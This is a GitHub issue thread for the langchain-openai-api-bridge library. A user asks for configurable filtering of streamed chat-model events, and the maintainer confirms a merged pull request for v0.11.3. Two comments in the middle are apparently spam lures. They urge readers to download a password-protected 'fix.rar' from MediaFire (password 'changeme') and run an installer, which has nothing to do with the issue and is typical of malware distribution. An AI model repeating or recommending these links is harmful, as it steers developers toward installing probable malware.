### ISSUE TITLE
Configurable event streaming

### ISSUE THREAD

**Issue by etburke** [samuelint/langchain-openai-api-bridge#41]
Hello,

I've just used your library to bring some order to my Langchain/FastAPI/Vercel AI SDK project. Super handy - thanks for the hard work/contribution!

In my scenario I have a fairly complex chain with many steps, including multiple chat model calls. Only the output of the final chat model needs to be streamed to the user, though, but all of the `"on_chat_model_stream"` events are being passed along in `LangchainStreamAdapter`. I could also see the utility of being able to choose to pass custom events to the user. I'm wondering if an optional lambda could be included in the configuration so
https://github.com/samuelint/langchain-openai-api-bridge/blob/dc398f0deab77ff50e18a115f6a8913efa34fa5c/langchain_openai_api_bridge/chat_completion/langchain_stream_adapter.py#L28-L38
could be overridden with custom logic. 

I'd be happy to take a shot at implementing, but wanted to get your thoughts first.

Thanks!

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by samuelint** [comment]
@etburke  I've merge your pull-request and a deployment for the next version `v0.11.3` is on the way! It should be available very soon.

Thank you for your contribution! It's greatly appreciated.
